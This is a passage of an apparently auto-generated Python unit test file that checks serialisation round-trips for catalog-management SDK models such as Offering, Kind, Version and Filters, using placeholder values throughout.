deployment_model_json['short_description'] = 'testString'
deployment_model_json['long_description'] = 'testString'
deployment_model_json['metadata'] = {}
deployment_model_json['tags'] = ['testString']
deployment_model_json['created'] = "2019-01-01T12:00:00Z"
deployment_model_json['updated'] = "2019-01-01T12:00:00Z"
# Construct a model instance of Deployment by calling from_dict on the json representation
deployment_model = Deployment.from_dict(deployment_model_json)
assert deployment_model != False
# Construct a model instance of Deployment by calling from_dict on the json representation
deployment_model_dict = Deployment.from_dict(deployment_model_json).__dict__
deployment_model2 = Deployment(**deployment_model_dict)
# Verify the model instances are equivalent
assert deployment_model == deployment_model2
# Convert model instance back to dict and verify no loss of data
deployment_model_json2 = deployment_model.to_dict()
assert deployment_model_json2 == deployment_model_json
class TestModel_Feature():
"""
Test Class for Feature
"""
def test_feature_serialization(self):
"""
Test serialization/deserialization for Feature
"""
# Construct a json representation of a Feature model
feature_model_json = {}
feature_model_json['title'] = 'testString'
feature_model_json['description'] = 'testString'
# Construct a model instance of Feature by calling from_dict on the json representation
feature_model = Feature.from_dict(feature_model_json)
assert feature_model != False
# Construct a model instance of Feature by calling from_dict on the json representation
feature_model_dict = Feature.from_dict(feature_model_json).__dict__
feature_model2 = Feature(**feature_model_dict)
# Verify the model instances are equivalent
assert feature_model == feature_model2
# Convert model instance back to dict and verify no loss of data
feature_model_json2 = feature_model.to_dict()
assert feature_model_json2 == feature_model_json
class TestModel_FilterTerms():
"""
Test Class for FilterTerms
"""
def test_filter_terms_serialization(self):
"""
Test serialization/deserialization for FilterTerms
"""
# Construct a json representation of a FilterTerms model
filter_terms_model_json = {}
filter_terms_model_json['filter_terms'] = ['testString']
# Construct a model instance of FilterTerms by calling from_dict on the json representation
filter_terms_model = FilterTerms.from_dict(filter_terms_model_json)
assert filter_terms_model != False
# Construct a model instance of FilterTerms by calling from_dict on the json representation
filter_terms_model_dict = FilterTerms.from_dict(filter_terms_model_json).__dict__
filter_terms_model2 = FilterTerms(**filter_terms_model_dict)
# Verify the model instances are equivalent
assert filter_terms_model == filter_terms_model2
# Convert model instance back to dict and verify no loss of data
filter_terms_model_json2 = filter_terms_model.to_dict()
assert filter_terms_model_json2 == filter_terms_model_json
class TestModel_Filters():
"""
Test Class for Filters
"""
def test_filters_serialization(self):
"""
Test serialization/deserialization for Filters
"""
# Construct dict forms of any model objects needed in order to build this model.
filter_terms_model = {} # FilterTerms
filter_terms_model['filter_terms'] = ['testString']
category_filter_model = {} # CategoryFilter
category_filter_model['include'] = True
category_filter_model['filter'] = filter_terms_model
id_filter_model = {} # IDFilter
id_filter_model['include'] = filter_terms_model
id_filter_model['exclude'] = filter_terms_model
# Construct a json representation of a Filters model
filters_model_json = {}
filters_model_json['include_all'] = True
filters_model_json['category_filters'] = {}
filters_model_json['id_filters'] = id_filter_model
# Construct a model instance of Filters by calling from_dict on the json representation
filters_model = Filters.from_dict(filters_model_json)
assert filters_model != False
# Construct a model instance of Filters by calling from_dict on the json representation
filters_model_dict = Filters.from_dict(filters_model_json).__dict__
filters_model2 = Filters(**filters_model_dict)
# Verify the model instances are equivalent
assert filters_model == filters_model2
# Convert model instance back to dict and verify no loss of data
filters_model_json2 = filters_model.to_dict()
assert filters_model_json2 == filters_model_json
class TestModel_IDFilter():
"""
Test Class for IDFilter
"""
def test_id_filter_serialization(self):
"""
Test serialization/deserialization for IDFilter
"""
# Construct dict forms of any model objects needed in order to build this model.
filter_terms_model = {} # FilterTerms
filter_terms_model['filter_terms'] = ['testString']
# Construct a json representation of a IDFilter model
id_filter_model_json = {}
id_filter_model_json['include'] = filter_terms_model
id_filter_model_json['exclude'] = filter_terms_model
# Construct a model instance of IDFilter by calling from_dict on the json representation
id_filter_model = IDFilter.from_dict(id_filter_model_json)
assert id_filter_model != False
# Construct a model instance of IDFilter by calling from_dict on the json representation
id_filter_model_dict = IDFilter.from_dict(id_filter_model_json).__dict__
id_filter_model2 = IDFilter(**id_filter_model_dict)
# Verify the model instances are equivalent
assert id_filter_model == id_filter_model2
# Convert model instance back to dict and verify no loss of data
id_filter_model_json2 = id_filter_model.to_dict()
assert id_filter_model_json2 == id_filter_model_json
class TestModel_Image():
"""
Test Class for Image
"""
def test_image_serialization(self):
"""
Test serialization/deserialization for Image
"""
# Construct a json representation of a Image model
image_model_json = {}
image_model_json['image'] = 'testString'
# Construct a model instance of Image by calling from_dict on the json representation
image_model = Image.from_dict(image_model_json)
assert image_model != False
# Construct a model instance of Image by calling from_dict on the json representation
image_model_dict = Image.from_dict(image_model_json).__dict__
image_model2 = Image(**image_model_dict)
# Verify the model instances are equivalent
assert image_model == image_model2
# Convert model instance back to dict and verify no loss of data
image_model_json2 = image_model.to_dict()
assert image_model_json2 == image_model_json
class TestModel_ImageManifest():
"""
Test Class for ImageManifest
"""
def test_image_manifest_serialization(self):
"""
Test serialization/deserialization for ImageManifest
"""
# Construct dict forms of any model objects needed in order to build this model.
image_model = {} # Image
image_model['image'] = 'testString'
# Construct a json representation of a ImageManifest model
image_manifest_model_json = {}
image_manifest_model_json['description'] = 'testString'
image_manifest_model_json['images'] = [image_model]
# Construct a model instance of ImageManifest by calling from_dict on the json representation
image_manifest_model = ImageManifest.from_dict(image_manifest_model_json)
assert image_manifest_model != False
# Construct a model instance of ImageManifest by calling from_dict on the json representation
image_manifest_model_dict = ImageManifest.from_dict(image_manifest_model_json).__dict__
image_manifest_model2 = ImageManifest(**image_manifest_model_dict)
# Verify the model instances are equivalent
assert image_manifest_model == image_manifest_model2
# Convert model instance back to dict and verify no loss of data
image_manifest_model_json2 = image_manifest_model.to_dict()
assert image_manifest_model_json2 == image_manifest_model_json
class TestModel_InstallStatus():
"""
Test Class for InstallStatus
"""
def test_install_status_serialization(self):
"""
Test serialization/deserialization for InstallStatus
"""
# Construct dict forms of any model objects needed in order to build this model.
install_status_metadata_model = {} # InstallStatusMetadata
install_status_metadata_model['cluster_id'] = 'testString'
install_status_metadata_model['region'] = 'testString'
install_status_metadata_model['namespace'] = 'testString'
install_status_metadata_model['workspace_id'] = 'testString'
install_status_metadata_model['workspace_name'] = 'testString'
install_status_release_model = {} # InstallStatusRelease
install_status_release_model['deployments'] = [{}]
install_status_release_model['replicasets'] = [{}]
install_status_release_model['statefulsets'] = [{}]
install_status_release_model['pods'] = [{}]
install_status_release_model['errors'] = [{}]
install_status_content_mgmt_model = {} # InstallStatusContentMgmt
install_status_content_mgmt_model['pods'] = [{}]
install_status_content_mgmt_model['errors'] = [{}]
# Construct a json representation of a InstallStatus model
install_status_model_json = {}
install_status_model_json['metadata'] = install_status_metadata_model
install_status_model_json['release'] = install_status_release_model
install_status_model_json['content_mgmt'] = install_status_content_mgmt_model
# Construct a model instance of InstallStatus by calling from_dict on the json representation
install_status_model = InstallStatus.from_dict(install_status_model_json)
assert install_status_model != False
# Construct a model instance of InstallStatus by calling from_dict on the json representation
install_status_model_dict = InstallStatus.from_dict(install_status_model_json).__dict__
install_status_model2 = InstallStatus(**install_status_model_dict)
# Verify the model instances are equivalent
assert install_status_model == install_status_model2
# Convert model instance back to dict and verify no loss of data
install_status_model_json2 = install_status_model.to_dict()
assert install_status_model_json2 == install_status_model_json
class TestModel_InstallStatusContentMgmt():
"""
Test Class for InstallStatusContentMgmt
"""
def test_install_status_content_mgmt_serialization(self):
"""
Test serialization/deserialization for InstallStatusContentMgmt
"""
# Construct a json representation of a InstallStatusContentMgmt model
install_status_content_mgmt_model_json = {}
install_status_content_mgmt_model_json['pods'] = [{}]
install_status_content_mgmt_model_json['errors'] = [{}]
# Construct a model instance of InstallStatusContentMgmt by calling from_dict on the json representation
install_status_content_mgmt_model = InstallStatusContentMgmt.from_dict(install_status_content_mgmt_model_json)
assert install_status_content_mgmt_model != False
# Construct a model instance of InstallStatusContentMgmt by calling from_dict on the json representation
install_status_content_mgmt_model_dict = InstallStatusContentMgmt.from_dict(install_status_content_mgmt_model_json).__dict__
install_status_content_mgmt_model2 = InstallStatusContentMgmt(**install_status_content_mgmt_model_dict)
# Verify the model instances are equivalent
assert install_status_content_mgmt_model == install_status_content_mgmt_model2
# Convert model instance back to dict and verify no loss of data
install_status_content_mgmt_model_json2 = install_status_content_mgmt_model.to_dict()
assert install_status_content_mgmt_model_json2 == install_status_content_mgmt_model_json
class TestModel_InstallStatusMetadata():
"""
Test Class for InstallStatusMetadata
"""
def test_install_status_metadata_serialization(self):
"""
Test serialization/deserialization for InstallStatusMetadata
"""
# Construct a json representation of a InstallStatusMetadata model
install_status_metadata_model_json = {}
install_status_metadata_model_json['cluster_id'] = 'testString'
install_status_metadata_model_json['region'] = 'testString'
install_status_metadata_model_json['namespace'] = 'testString'
install_status_metadata_model_json['workspace_id'] = 'testString'
install_status_metadata_model_json['workspace_name'] = 'testString'
# Construct a model instance of InstallStatusMetadata by calling from_dict on the json representation
install_status_metadata_model = InstallStatusMetadata.from_dict(install_status_metadata_model_json)
assert install_status_metadata_model != False
# Construct a model instance of InstallStatusMetadata by calling from_dict on the json representation
install_status_metadata_model_dict = InstallStatusMetadata.from_dict(install_status_metadata_model_json).__dict__
install_status_metadata_model2 = InstallStatusMetadata(**install_status_metadata_model_dict)
# Verify the model instances are equivalent
assert install_status_metadata_model == install_status_metadata_model2
# Convert model instance back to dict and verify no loss of data
install_status_metadata_model_json2 = install_status_metadata_model.to_dict()
assert install_status_metadata_model_json2 == install_status_metadata_model_json
class TestModel_InstallStatusRelease():
"""
Test Class for InstallStatusRelease
"""
def test_install_status_release_serialization(self):
"""
Test serialization/deserialization for InstallStatusRelease
"""
# Construct a json representation of a InstallStatusRelease model
install_status_release_model_json = {}
install_status_release_model_json['deployments'] = [{}]
install_status_release_model_json['replicasets'] = [{}]
install_status_release_model_json['statefulsets'] = [{}]
install_status_release_model_json['pods'] = [{}]
install_status_release_model_json['errors'] = [{}]
# Construct a model instance of InstallStatusRelease by calling from_dict on the json representation
install_status_release_model = InstallStatusRelease.from_dict(install_status_release_model_json)
assert install_status_release_model != False
# Construct a model instance of InstallStatusRelease by calling from_dict on the json representation
install_status_release_model_dict = InstallStatusRelease.from_dict(install_status_release_model_json).__dict__
install_status_release_model2 = InstallStatusRelease(**install_status_release_model_dict)
# Verify the model instances are equivalent
assert install_status_release_model == install_status_release_model2
# Convert model instance back to dict and verify no loss of data
install_status_release_model_json2 = install_status_release_model.to_dict()
assert install_status_release_model_json2 == install_status_release_model_json
class TestModel_Kind():
"""
Test Class for Kind
"""
def test_kind_serialization(self):
"""
Test serialization/deserialization for Kind
"""
# Construct dict forms of any model objects needed in order to build this model.
feature_model = {} # Feature
feature_model['title'] = 'testString'
feature_model['description'] = 'testString'
configuration_model = {} # Configuration
configuration_model['key'] = 'testString'
configuration_model['type'] = 'testString'
configuration_model['default_value'] = { 'foo': 'bar' }
configuration_model['value_constraint'] = 'testString'
configuration_model['description'] = 'testString'
configuration_model['required'] = True
configuration_model['options'] = [{ 'foo': 'bar' }]
configuration_model['hidden'] = True
validation_model = {} # Validation
validation_model['validated'] = "2019-01-01T12:00:00Z"
validation_model['requested'] = "2019-01-01T12:00:00Z"
validation_model['state'] = 'testString'
validation_model['last_operation'] = 'testString'
validation_model['target'] = {}
resource_model = {} # Resource
resource_model['type'] = 'mem'
resource_model['value'] = { 'foo': 'bar' }
script_model = {} # Script
script_model['instructions'] = 'testString'
script_model['script'] = 'testString'
script_model['script_permission'] = 'testString'
script_model['delete_script'] = 'testString'
script_model['scope'] = 'testString'
version_entitlement_model = {} # VersionEntitlement
version_entitlement_model['provider_name'] = 'testString'
version_entitlement_model['provider_id'] = 'testString'
version_entitlement_model['product_id'] = 'testString'
version_entitlement_model['part_numbers'] = ['testString']
version_entitlement_model['image_repo_name'] = 'testString'
license_model = {} # License
license_model['id'] = 'testString'
license_model['name'] = 'testString'
license_model['type'] = 'testString'
license_model['url'] = 'testString'
license_model['description'] = 'testString'
state_model = {} # State
state_model['current'] = 'testString'
state_model['current_entered'] = "2019-01-01T12:00:00Z"
state_model['pending'] = 'testString'
state_model['pending_requested'] = "2019-01-01T12:00:00Z"
state_model['previous'] = 'testString'
version_model = {} # Version
version_model['id'] = 'testString'
version_model['_rev'] = 'testString'
version_model['crn'] = 'testString'
version_model['version'] = 'testString'
version_model['sha'] = 'testString'
version_model['created'] = "2019-01-01T12:00:00Z"
version_model['updated'] = "2019-01-01T12:00:00Z"
version_model['offering_id'] = 'testString'
version_model['catalog_id'] = 'testString'
version_model['kind_id'] = 'testString'
version_model['tags'] = ['testString']
version_model['repo_url'] = 'testString'
version_model['source_url'] = 'testString'
version_model['tgz_url'] = 'testString'
version_model['configuration'] = [configuration_model]
version_model['metadata'] = {}
version_model['validation'] = validation_model
version_model['required_resources'] = [resource_model]
version_model['single_instance'] = True
version_model['install'] = script_model
version_model['pre_install'] = [script_model]
version_model['entitlement'] = version_entitlement_model
version_model['licenses'] = [license_model]
version_model['image_manifest_url'] = 'testString'
version_model['deprecated'] = True
version_model['package_version'] = 'testString'
version_model['state'] = state_model
version_model['version_locator'] = 'testString'
version_model['console_url'] = 'testString'
version_model['long_description'] = 'testString'
version_model['whitelisted_accounts'] = ['testString']
deployment_model = {} # Deployment
deployment_model['id'] = 'testString'
deployment_model['label'] = 'testString'
deployment_model['name'] = 'testString'
deployment_model['short_description'] = 'testString'
deployment_model['long_description'] = 'testString'
deployment_model['metadata'] = {}
deployment_model['tags'] = ['testString']
deployment_model['created'] = "2019-01-01T12:00:00Z"
deployment_model['updated'] = "2019-01-01T12:00:00Z"
plan_model = {} # Plan
plan_model['id'] = 'testString'
plan_model['label'] = 'testString'
plan_model['name'] = 'testString'
plan_model['short_description'] = 'testString'
plan_model['long_description'] = 'testString'
plan_model['metadata'] = {}
plan_model['tags'] = ['testString']
plan_model['additional_features'] = [feature_model]
plan_model['created'] = "2019-01-01T12:00:00Z"
plan_model['updated'] = "2019-01-01T12:00:00Z"
plan_model['deployments'] = [deployment_model]
# Construct a json representation of a Kind model
kind_model_json = {}
kind_model_json['id'] = 'testString'
kind_model_json['format_kind'] = 'testString'
kind_model_json['target_kind'] = 'testString'
kind_model_json['metadata'] = {}
kind_model_json['install_description'] = 'testString'
kind_model_json['tags'] = ['testString']
kind_model_json['additional_features'] = [feature_model]
kind_model_json['created'] = "2019-01-01T12:00:00Z"
kind_model_json['updated'] = "2019-01-01T12:00:00Z"
kind_model_json['versions'] = [version_model]
kind_model_json['plans'] = [plan_model]
# Construct a model instance of Kind by calling from_dict on the json representation
kind_model = Kind.from_dict(kind_model_json)
assert kind_model != False
# Construct a model instance of Kind by calling from_dict on the json representation
kind_model_dict = Kind.from_dict(kind_model_json).__dict__
kind_model2 = Kind(**kind_model_dict)
# Verify the model instances are equivalent
assert kind_model == kind_model2
# Convert model instance back to dict and verify no loss of data
kind_model_json2 = kind_model.to_dict()
assert kind_model_json2 == kind_model_json
class TestModel_License():
"""
Test Class for License
"""
def test_license_serialization(self):
"""
Test serialization/deserialization for License
"""
# Construct a json representation of a License model
license_model_json = {}
license_model_json['id'] = 'testString'
license_model_json['name'] = 'testString'
license_model_json['type'] = 'testString'
license_model_json['url'] = 'testString'
license_model_json['description'] = 'testString'
# Construct a model instance of License by calling from_dict on the json representation
license_model = License.from_dict(license_model_json)
assert license_model != False
# Construct a model instance of License by calling from_dict on the json representation
license_model_dict = License.from_dict(license_model_json).__dict__
license_model2 = License(**license_model_dict)
# Verify the model instances are equivalent
assert license_model == license_model2
# Convert model instance back to dict and verify no loss of data
license_model_json2 = license_model.to_dict()
assert license_model_json2 == license_model_json
class TestModel_NamespaceSearchResult():
"""
Test Class for NamespaceSearchResult
"""
def test_namespace_search_result_serialization(self):
"""
Test serialization/deserialization for NamespaceSearchResult
"""
# Construct a json representation of a NamespaceSearchResult model
namespace_search_result_model_json = {}
namespace_search_result_model_json['offset'] = 38
namespace_search_result_model_json['limit'] = 38
namespace_search_result_model_json['total_count'] = 38
namespace_search_result_model_json['resource_count'] = 38
namespace_search_result_model_json['first'] = 'testString'
namespace_search_result_model_json['last'] = 'testString'
namespace_search_result_model_json['prev'] = 'testString'
namespace_search_result_model_json['next'] = 'testString'
namespace_search_result_model_json['resources'] = ['testString']
# Construct a model instance of NamespaceSearchResult by calling from_dict on the json representation
namespace_search_result_model = NamespaceSearchResult.from_dict(namespace_search_result_model_json)
assert namespace_search_result_model != False
# Construct a model instance of NamespaceSearchResult by calling from_dict on the json representation
namespace_search_result_model_dict = NamespaceSearchResult.from_dict(namespace_search_result_model_json).__dict__
namespace_search_result_model2 = NamespaceSearchResult(**namespace_search_result_model_dict)
# Verify the model instances are equivalent
assert namespace_search_result_model == namespace_search_result_model2
# Convert model instance back to dict and verify no loss of data
namespace_search_result_model_json2 = namespace_search_result_model.to_dict()
assert namespace_search_result_model_json2 == namespace_search_result_model_json
class TestModel_ObjectAccess():
"""
Test Class for ObjectAccess
"""
def test_object_access_serialization(self):
"""
Test serialization/deserialization for ObjectAccess
"""
# Construct a json representation of a ObjectAccess model
object_access_model_json = {}
object_access_model_json['id'] = 'testString'
object_access_model_json['account'] = 'testString'
object_access_model_json['catalog_id'] = 'testString'
object_access_model_json['target_id'] = 'testString'
object_access_model_json['create'] = "2019-01-01T12:00:00Z"
# Construct a model instance of ObjectAccess by calling from_dict on the json representation
object_access_model = ObjectAccess.from_dict(object_access_model_json)
assert object_access_model != False
# Construct a model instance of ObjectAccess by calling from_dict on the json representation
object_access_model_dict = ObjectAccess.from_dict(object_access_model_json).__dict__
object_access_model2 = ObjectAccess(**object_access_model_dict)
# Verify the model instances are equivalent
assert object_access_model == object_access_model2
# Convert model instance back to dict and verify no loss of data
object_access_model_json2 = object_access_model.to_dict()
assert object_access_model_json2 == object_access_model_json
class TestModel_ObjectAccessListResult():
"""
Test Class for ObjectAccessListResult
"""
def test_object_access_list_result_serialization(self):
"""
Test serialization/deserialization for ObjectAccessListResult
"""
# Construct dict forms of any model objects needed in order to build this model.
object_access_model = {} # ObjectAccess
object_access_model['id'] = 'testString'
object_access_model['account'] = 'testString'
object_access_model['catalog_id'] = 'testString'
object_access_model['target_id'] = 'testString'
object_access_model['create'] = "2019-01-01T12:00:00Z"
# Construct a json representation of a ObjectAccessListResult model
object_access_list_result_model_json = {}
object_access_list_result_model_json['offset'] = 38
object_access_list_result_model_json['limit'] = 38
object_access_list_result_model_json['total_count'] = 38
object_access_list_result_model_json['resource_count'] = 38
object_access_list_result_model_json['first'] = 'testString'
object_access_list_result_model_json['last'] = 'testString'
object_access_list_result_model_json['prev'] = 'testString'
object_access_list_result_model_json['next'] = 'testString'
object_access_list_result_model_json['resources'] = [object_access_model]
# Construct a model instance of ObjectAccessListResult by calling from_dict on the json representation
object_access_list_result_model = ObjectAccessListResult.from_dict(object_access_list_result_model_json)
assert object_access_list_result_model != False
# Construct a model instance of ObjectAccessListResult by calling from_dict on the json representation
object_access_list_result_model_dict = ObjectAccessListResult.from_dict(object_access_list_result_model_json).__dict__
object_access_list_result_model2 = ObjectAccessListResult(**object_access_list_result_model_dict)
# Verify the model instances are equivalent
assert object_access_list_result_model == object_access_list_result_model2
# Convert model instance back to dict and verify no loss of data
object_access_list_result_model_json2 = object_access_list_result_model.to_dict()
assert object_access_list_result_model_json2 == object_access_list_result_model_json
class TestModel_ObjectListResult():
"""
Test Class for ObjectListResult
"""
def test_object_list_result_serialization(self):
"""
Test serialization/deserialization for ObjectListResult
"""
# Construct dict forms of any model objects needed in order to build this model.
publish_object_model = {} # PublishObject
publish_object_model['permit_ibm_public_publish'] = True
publish_object_model['ibm_approved'] = True
publish_object_model['public_approved'] = True
publish_object_model['portal_approval_record'] = 'testString'
publish_object_model['portal_url'] = 'testString'
state_model = {} # State
state_model['current'] = 'testString'
state_model['current_entered'] = "2019-01-01T12:00:00Z"
state_model['pending'] = 'testString'
state_model['pending_requested'] = "2019-01-01T12:00:00Z"
state_model['previous'] = 'testString'
catalog_object_model = {} # CatalogObject
catalog_object_model['id'] = 'testString'
catalog_object_model['name'] = 'testString'
catalog_object_model['_rev'] = 'testString'
catalog_object_model['crn'] = 'testString'
catalog_object_model['url'] = 'testString'
catalog_object_model['parent_id'] = 'testString'
catalog_object_model['label_i18n'] = 'testString'
catalog_object_model['label'] = 'testString'
catalog_object_model['tags'] = ['testString']
catalog_object_model['created'] = "2019-01-01T12:00:00Z"
catalog_object_model['updated'] = "2019-01-01T12:00:00Z"
catalog_object_model['short_description'] = 'testString'
catalog_object_model['short_description_i18n'] = 'testString'
catalog_object_model['kind'] = 'testString'
catalog_object_model['publish'] = publish_object_model
catalog_object_model['state'] = state_model
catalog_object_model['catalog_id'] = 'testString'
catalog_object_model['catalog_name'] = 'testString'
catalog_object_model['data'] = {}
# Construct a json representation of a ObjectListResult model
object_list_result_model_json = {}
object_list_result_model_json['offset'] = 38
object_list_result_model_json['limit'] = 38
object_list_result_model_json['total_count'] = 38
object_list_result_model_json['resource_count'] = 38
object_list_result_model_json['first'] = 'testString'
object_list_result_model_json['last'] = 'testString'
object_list_result_model_json['prev'] = 'testString'
object_list_result_model_json['next'] = 'testString'
object_list_result_model_json['resources'] = [catalog_object_model]
# Construct a model instance of ObjectListResult by calling from_dict on the json representation
object_list_result_model = ObjectListResult.from_dict(object_list_result_model_json)
assert object_list_result_model != False
# Construct a model instance of ObjectListResult by calling from_dict on the json representation
object_list_result_model_dict = ObjectListResult.from_dict(object_list_result_model_json).__dict__
object_list_result_model2 = ObjectListResult(**object_list_result_model_dict)
# Verify the model instances are equivalent
assert object_list_result_model == object_list_result_model2
# Convert model instance back to dict and verify no loss of data
object_list_result_model_json2 = object_list_result_model.to_dict()
assert object_list_result_model_json2 == object_list_result_model_json
class TestModel_ObjectSearchResult():
"""
Test Class for ObjectSearchResult
"""
def test_object_search_result_serialization(self):
"""
Test serialization/deserialization for ObjectSearchResult
"""
# Construct dict forms of any model objects needed in order to build this model.
publish_object_model = {} # PublishObject
publish_object_model['permit_ibm_public_publish'] = True
publish_object_model['ibm_approved'] = True
publish_object_model['public_approved'] = True
publish_object_model['portal_approval_record'] = 'testString'
publish_object_model['portal_url'] = 'testString'
state_model = {} # State
state_model['current'] = 'testString'
state_model['current_entered'] = "2019-01-01T12:00:00Z"
state_model['pending'] = 'testString'
state_model['pending_requested'] = "2019-01-01T12:00:00Z"
state_model['previous'] = 'testString'
catalog_object_model = {} # CatalogObject
catalog_object_model['id'] = 'testString'
catalog_object_model['name'] = 'testString'
catalog_object_model['_rev'] = 'testString'
catalog_object_model['crn'] = 'testString'
catalog_object_model['url'] = 'testString'
catalog_object_model['parent_id'] = 'testString'
catalog_object_model['label_i18n'] = 'testString'
catalog_object_model['label'] = 'testString'
catalog_object_model['tags'] = ['testString']
catalog_object_model['created'] = "2019-01-01T12:00:00Z"
catalog_object_model['updated'] = "2019-01-01T12:00:00Z"
catalog_object_model['short_description'] = 'testString'
catalog_object_model['short_description_i18n'] = 'testString'
catalog_object_model['kind'] = 'testString'
catalog_object_model['publish'] = publish_object_model
catalog_object_model['state'] = state_model
catalog_object_model['catalog_id'] = 'testString'
catalog_object_model['catalog_name'] = 'testString'
catalog_object_model['data'] = {}
# Construct a json representation of a ObjectSearchResult model
object_search_result_model_json = {}
object_search_result_model_json['offset'] = 38
object_search_result_model_json['limit'] = 38
object_search_result_model_json['total_count'] = 38
object_search_result_model_json['resource_count'] = 38
object_search_result_model_json['first'] = 'testString'
object_search_result_model_json['last'] = 'testString'
object_search_result_model_json['prev'] = 'testString'
object_search_result_model_json['next'] = 'testString'
object_search_result_model_json['resources'] = [catalog_object_model]
# Construct a model instance of ObjectSearchResult by calling from_dict on the json representation
object_search_result_model = ObjectSearchResult.from_dict(object_search_result_model_json)
assert object_search_result_model != False
# Construct a model instance of ObjectSearchResult by calling from_dict on the json representation
object_search_result_model_dict = ObjectSearchResult.from_dict(object_search_result_model_json).__dict__
object_search_result_model2 = ObjectSearchResult(**object_search_result_model_dict)
# Verify the model instances are equivalent
assert object_search_result_model == object_search_result_model2
# Convert model instance back to dict and verify no loss of data
object_search_result_model_json2 = object_search_result_model.to_dict()
assert object_search_result_model_json2 == object_search_result_model_json
class TestModel_Offering():
"""
Test Class for Offering
"""
def test_offering_serialization(self):
"""
Test serialization/deserialization for Offering
"""
# Construct dict forms of any model objects needed in order to build this model.
rating_model = {} # Rating
rating_model['one_star_count'] = 38
rating_model['two_star_count'] = 38
rating_model['three_star_count'] = 38
rating_model['four_star_count'] = 38
feature_model = {} # Feature
feature_model['title'] = 'testString'
feature_model['description'] = 'testString'
configuration_model = {} # Configuration
configuration_model['key'] = 'testString'
configuration_model['type'] = 'testString'
configuration_model['default_value'] = { 'foo': 'bar' }
configuration_model['value_constraint'] = 'testString'
configuration_model['description'] = 'testString'
configuration_model['required'] = True
configuration_model['options'] = [{ 'foo': 'bar' }]
configuration_model['hidden'] = True
validation_model = {} # Validation
validation_model['validated'] = "2019-01-01T12:00:00Z"
validation_model['requested'] = "2019-01-01T12:00:00Z"
validation_model['state'] = 'testString'
validation_model['last_operation'] = 'testString'
validation_model['target'] = {}
resource_model = {} # Resource
resource_model['type'] = 'mem'
resource_model['value'] = { 'foo': 'bar' }
script_model = {} # Script
script_model['instructions'] = 'testString'
script_model['script'] = 'testString'
script_model['script_permission'] = 'testString'
script_model['delete_script'] = 'testString'
script_model['scope'] = 'testString'
version_entitlement_model = {} # VersionEntitlement
version_entitlement_model['provider_name'] = 'testString'
version_entitlement_model['provider_id'] = 'testString'
version_entitlement_model['product_id'] = 'testString'
version_entitlement_model['part_numbers'] = ['testString']
version_entitlement_model['image_repo_name'] = 'testString'
license_model = {} # License
license_model['id'] = 'testString'
license_model['name'] = 'testString'
license_model['type'] = 'testString'
license_model['url'] = 'testString'
license_model['description'] = 'testString'
state_model = {} # State
state_model['current'] = 'testString'
state_model['current_entered'] = "2019-01-01T12:00:00Z"
state_model['pending'] = 'testString'
state_model['pending_requested'] = "2019-01-01T12:00:00Z"
state_model['previous'] = 'testString'
version_model = {} # Version
version_model['id'] = 'testString'
version_model['_rev'] = 'testString'
version_model['crn'] = 'testString'
version_model['version'] = 'testString'
version_model['sha'] = 'testString'
version_model['created'] = "2019-01-01T12:00:00Z"
version_model['updated'] = "2019-01-01T12:00:00Z"
version_model['offering_id'] = 'testString'
version_model['catalog_id'] = 'testString'
version_model['kind_id'] = 'testString'
version_model['tags'] = ['testString']
version_model['repo_url'] = 'testString'
version_model['source_url'] = 'testString'
version_model['tgz_url'] = 'testString'
version_model['configuration'] = [configuration_model]
version_model['metadata'] = {}
version_model['validation'] = validation_model
version_model['required_resources'] = [resource_model]
version_model['single_instance'] = True
version_model['install'] = script_model
version_model['pre_install'] = [script_model]
version_model['entitlement'] = version_entitlement_model
version_model['licenses'] = [license_model]
version_model['image_manifest_url'] = 'testString'
version_model['deprecated'] = True
version_model['package_version'] = 'testString'
version_model['state'] = state_model
version_model['version_locator'] = 'testString'
version_model['console_url'] = 'testString'
version_model['long_description'] = 'testString'
version_model['whitelisted_accounts'] = ['testString']
deployment_model = {} # Deployment
deployment_model['id'] = 'testString'
deployment_model['label'] = 'testString'
deployment_model['name'] = 'testString'
deployment_model['short_description'] = 'testString'
deployment_model['long_description'] = 'testString'
deployment_model['metadata'] = {}
deployment_model['tags'] = ['testString']
deployment_model['created'] = "2019-01-01T12:00:00Z"
deployment_model['updated'] = "2019-01-01T12:00:00Z"
plan_model = {} # Plan
plan_model['id'] = 'testString'
plan_model['label'] = 'testString'
plan_model['name'] = 'testString'
plan_model['short_description'] = 'testString'
plan_model['long_description'] = 'testString'
plan_model['metadata'] = {}
plan_model['tags'] = ['testString']
plan_model['additional_features'] = [feature_model]
plan_model['created'] = "2019-01-01T12:00:00Z"
plan_model['updated'] = "2019-01-01T12:00:00Z"
plan_model['deployments'] = [deployment_model]
kind_model = {} # Kind
kind_model['id'] = 'testString'
kind_model['format_kind'] = 'testString'
kind_model['target_kind'] = 'testString'
kind_model['metadata'] = {}
kind_model['install_description'] = 'testString'
kind_model['tags'] = ['testString']
kind_model['additional_features'] = [feature_model]
kind_model['created'] = "2019-01-01T12:00:00Z"
kind_model['updated'] = "2019-01-01T12:00:00Z"
kind_model['versions'] = [version_model]
kind_model['plans'] = [plan_model]
repo_info_model = {} # RepoInfo
repo_info_model['token'] = 'testString'
repo_info_model['type'] = 'testString'
# Construct a json representation of a Offering model
offering_model_json = {}
offering_model_json['id'] = 'testString'
offering_model_json['_rev'] = 'testString'
offering_model_json['url'] = 'testString'
offering_model_json['crn'] = 'testString'
offering_model_json['label'] = 'testString'
offering_model_json['name'] = 'testString'
offering_model_json['offering_icon_url'] = 'testString'
offering_model_json['offering_docs_url'] = 'testString'
offering_model_json['offering_support_url'] = 'testString'
offering_model_json['tags'] = ['testString']
offering_model_json['keywords'] = ['testString']
offering_model_json['rating'] = rating_model
offering_model_json['created'] = "2019-01-01T12:00:00Z"
offering_model_json['updated'] = "2019-01-01T12:00:00Z"
offering_model_json['short_description'] = 'testString'
offering_model_json['long_description'] = 'testString'
offering_model_json['features'] = [feature_model]
offering_model_json['kinds'] = [kind_model]
offering_model_json['permit_request_ibm_public_publish'] = True
offering_model_json['ibm_publish_approved'] = True
offering_model_json['public_publish_approved'] = True
offering_model_json['public_original_crn'] = 'testString'
offering_model_json['publish_public_crn'] = 'testString'
offering_model_json['portal_approval_record'] = 'testString'
offering_model_json['portal_ui_url'] = 'testString'
offering_model_json['catalog_id'] = 'testString'
offering_model_json['catalog_name'] = 'testString'
offering_model_json['metadata'] = {}
offering_model_json['disclaimer'] = 'testString'
offering_model_json['hidden'] = True
offering_model_json['provider'] = 'testString'
offering_model_json['repo_info'] = repo_info_model
# Construct a model instance of Offering by calling from_dict on the json representation
offering_model = Offering.from_dict(offering_model_json)
assert offering_model != False
